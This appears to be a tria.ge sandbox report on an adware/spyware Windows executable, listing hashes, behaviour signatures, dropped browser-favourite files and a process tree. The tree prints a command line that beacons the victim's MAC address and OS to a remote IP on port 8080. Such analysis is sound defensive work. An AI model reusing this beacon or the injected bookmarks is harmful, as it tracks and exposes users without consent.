Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

7

6ce34128a3...9b.exe

windows7-x64

7

6ce34128a3...9b.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    223s
  • max time network
    225s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/12/2023, 12:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6ce34128a380acd62f11e7c717dc659b.exe

  • Size

    50KB

  • MD5

    6ce34128a380acd62f11e7c717dc659b

  • SHA1

    098aad5d2ad5a39afbea44cec3f0b6d3e798d02a

  • SHA256

    ec523820326eadb37a8ea176c6224ca867897c254973547063c5499bd9d2c7f5

  • SHA512

    384654067b93ba4dbc091cafaa001476e8294108542aed4d471587396edc45ed75501e39bc8f9b1208a259c6f7827c7f05c6d938f3343541d239cbce4f5bf0cc

  • SSDEEP

    1536:yakmRBsLfsNhIAsdxn6sM0TZMl9VZdzh5vaYqAzNY:Nki2Lf4hIAsdxn6sM0TZMl9VZdzh5vaH

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6ce34128a380acd62f11e7c717dc659b.exe
    "C:\Users\Admin\AppData\Local\Temp\6ce34128a380acd62f11e7c717dc659b.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious use of WriteProcessMemory
    PID:4784
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=42-e2-02-19-f0-c2&os=Microsoft Windows XP&flag=df08c1c065f69dcea338b20efa14e02e&user=6ce34128a380acd62f11e7c717dc659b
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4924
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4924 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4880

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verABD6.tmp
    Filesize

    15KB

    MD5

    1a545d0052b581fbb2ab4c52133846bc

    SHA1

    62f3266a9b9925cd6d98658b92adec673cbe3dd3

    SHA256

    557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

    SHA512

    bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\43O0UZKG\suggestions[1].en-US
    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

    Download Submit

  • C:\Users\Admin\Favorites\45575.comÔÚÏßµÄСÓÎÏ·.×îºÃÍæ×îÐÂ×î¿ì¿á³¬¼¶Ð¡ÓÎÏ·!.html
    Filesize

    259B

    MD5

    9eb23c46d269c9debb4345e011e07a4c

    SHA1

    1af312d49b19680ba9776e003aced6602937900f

    SHA256

    f6711066243605d4efa6c1015a4dab4d4e57063a2b84513b665d795bd572c047

    SHA512

    d39d84d0b2b0d9ec520aecbb5dcf26b5b7809048bc895c20c503ac370127f4d56af50ff525843b3bc31f1eef22c6bdae9c672a81b8591f9d1350e343c881ef23

    Download Submit

  • C:\Users\Admin\Favorites\°¬³ÈÅ®×°--×îÃÀÀöʱÉеÄÅ®×°Æ·ÅÆ.ÃÀÅ®ÂòÒ£¬Ãëɱ°¬³ÈÅ®×°!!.html
    Filesize

    261B

    MD5

    7bd1b88f31a6da5622837b47f26c9d3a

    SHA1

    8dfae3dcb5c0e295aa1d1b273af830e4f54d3d10

    SHA256

    6e3a41335a892b2dd58ede098db183b04e58a95b44c51e5de96fa07de0d02085

    SHA512

    8347d358c0157a57958242938c3e844f050b5a7e77d14ae1f7a99a6508766160b8e59bb5a94c5993d5a4c9ea901b1988c35648c9b8fd447589684f599b6ff443

    Download Submit

  • C:\Users\Admin\Favorites\µ±µ±Íø¡ªÍøÉϹºÎïÖÐÐÄ.html
    Filesize

    261B

    MD5

    0d4670b01f65bc72dbf1af3b36ef4f2d

    SHA1

    97553344d494e9b52990d3e1de18db8d1bbc8744

    SHA256

    306a437106117981a9b66c57946da8388998cda83870657b63b0858e8ae12d39

    SHA512

    217d351fa2416443f180efc75ee6306da701a5feae1ad779bbb57682e314b7a310ad0db27f2e0815c936713bbe816086a3d1bbdc9d48cc08afc8d33f0b5702b6

    Download Submit

  • C:\Users\Admin\Favorites\¿´¿´µçÊÓ¾çÔÚÏß´óÈ«,,,×îºÃÂÌÉ«×îиßËÙÃâ·ÑµçÊÓ¾çÍøÕ¾!.html
    Filesize

    266B

    MD5

    c81a8562bf7c8401b8052977fe6e802a

    SHA1

    e54c0e0b91d5a861b20548d30a2ffd350abfac09

    SHA256

    8d101ea02c9bce0d4d091b247546d4caccd887752b6f4c3b44a0f8956c303fda

    SHA512

    f9c855217976830f76a42561ddb181cbc8879a0327db7940715d3e377dd047dbd9c0852c68751dfd9a6e2f564f10338820c02c98f73ffc0a5ed9dd50fc1652cb

    Download Submit

  • C:\Users\Admin\Favorites\ÃÀÅ®·áÐØ´óÃؾ÷-20ÌìÄÚѸËÙÔö´ó´ó´ó!.html
    Filesize

    271B

    MD5

    e5c8bb1ba6bc6de3d4ddac2f0bf47e7d

    SHA1

    70900371edfcdcb01b063e731e56d129369c64a8

    SHA256

    334812944df9a9938b114b7ec02177c4bdb6cbb8dd362ea43d119a37feb2062f

    SHA512

    c3635728cb6e5327276220b57bab8c6068b50130250f8151c06134f17e143067feb04e2f47cecf6fca0d6c046325012492c67d3837ea3e57a516e0b7c4408769

    Download Submit

  • C:\Users\Admin\Favorites\ÌÔ±¦Íø - ÌÔ£¡ÎÒϲ»¶.html
    Filesize

    261B

    MD5

    c6140fc6cd1250bd67a4a22d7c74ec54

    SHA1

    d8371058038d78bd6d5dd8c13bafa21d236cf3e7

    SHA256

    a18fe5781913c54cf547f8bed109aa7de0961189bc7ee91e0a1851b6ca9d0610

    SHA512

    aa50040890a99db0d083674297f19c23f083934bbcc4eb30ee1ec358aa4418e2b017d2bd4314e9ed9d115e710637c82899915897118bc47c1e4edac8858cd3f7

    Download Submit

  • C:\Users\Admin\Favorites\Öйú¸£Àû²ÊƱ£¬ÌåÓý²ÊƱµÄͶעÖÐÐÄ.²ÊƱ´óÓ®¼Ò£¡.html
    Filesize

    261B

    MD5

    1dd93ff89bb660ccd77ec626a0cd052a

    SHA1

    b895b52dc80ac06edf398e538d1b82ae88df554a

    SHA256

    13aa3b6e21889b5f35f27aed509a62deea1c40de9cf1f9730328157dc00d8c9e

    SHA512

    254e5f9db48ccb6f293beb7865f21449bcdc151fed0f6b5dafba7dc7e52ac5829a50af3132c46832ad68f20e9d2b6f64c7b973a79b09e1b4d601033ae99e375e

    Download Submit

  • C:\Users\Admin\Favorites\׿ԽÑÇÂíÑ·ÍøÉϹºÎïͼÊ飬ÊÖ»ú£¬ÊýÂ룬¼Òµç£¬»¯×±Æ·£¬ÖÓ±í£¬Ê×ÊεÈÔÚÏßÏúÊÛ.html
    Filesize

    261B

    MD5

    8c9d533856807659bd89d3a99b1bedfc

    SHA1

    a55b51b5f91bea060463db9266dd6dbbc1de6ef5

    SHA256

    dd59719dc8255bddc6dcb6f54e27ab82b8f0285280379c8a90d5043d657f16fa

    SHA512

    2d8bb0fae1e09094b7e08b0c4dea5e4b9cf97cbf25638df1a7db14b113e6ab8a95f160a7ada024700f048962c2baf7bf963d16b783a45b83d1d20399cc81d158

    Download Submit

  • C:\Users\Admin\Favorites\×îм«Æ·ÂÌÉ«ºÃµÄµçÓ°¿âÃâ·Ñ.¸ßÇå¸ßËÙ£¡ÌìÌì¸üÐÂ!!.html
    Filesize

    264B

    MD5

    ee765b1ebea1c25ae9e7f3ce73841c46

    SHA1

    9a729deb3d211e8bbb0198bb5e7f436056293331

    SHA256

    2013251dc3e77710d417cc8c51fdcaa3d9e4ec7c019c55020994130639f87f65

    SHA512

    5cf9a564be444151dcc8cf960aee916bbd7c21874e98a0a594d2e40e5861bdbf2cac37d8da7c30b564529600c948feefd8eda45a0bd5e55e5d5b75fe9ac84434

    Download Submit

  • C:\Users\Admin\Favorites\×îÐÂÔÚÏßС˵Ãâ·ÑµÄÔĶÁ.·á¸»ÄÚÈÝËٶȿìµÄС˵վ!.html
    Filesize

    264B

    MD5

    428d1e753132e1fe27a06715e484ecc8

    SHA1

    62bd82694da83f087052c2cb6a8de923628f02a1

    SHA256

    42ca671a0639af6857bfe9716d48aa978210a66d98948a978066e1df90ad4377

    SHA512

    c21a1473639acc7f1c9f7847d0442d4ee5cbfa09d121f3024163af63a70968620bd16b56ccbca6dcb6447c4d01fb9df9dc5482ed29b38984a64afb39aadad317

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    878778e6ae273c74668c90ff5fc48431

    SHA1

    b85a0b7416e86c8f485be4b6c349f0ab426bc5b3

    SHA256

    119d16ac01b447b28a850c44efe9ef52f38ca8b1f9702404451fa7bfa85264c2

    SHA512

    936ae49cac20a0ec4ad87a06f4d55f629341c8713768f52ccc111a95272c7feae5614d897d2df6077b203d1d5c150b6375d1fefc9d8383daf104996501269c09

    Download Submit

  • C:\b.txt
    Filesize

    3KB

    MD5

    ca0294359fd9a7a27616a18c22dbd68a

    SHA1

    12aa0ef1265d0bfe5b3dd60f8aa8b71708f34104

    SHA256

    af5fc76f77e480486e0592397a6a3d22fa750eef1d20e4d5fe54937879096286

    SHA512

    8b5e93b96e3ef5da76db8f0b3bc841151fe868e71ba37cb17a3b4aea7945118983b18988e53d8b498c9a539ad982e1e9b41b5c4117d223246bc44119a8475621

    Download Submit

  • memory/4784-0-0x0000000000400000-0x0000000000421000-memory.dmp

    Filesize

    132KB

    Download

  • memory/4784-96-0x0000000000400000-0x0000000000421000-memory.dmp

    Filesize

    132KB

    Download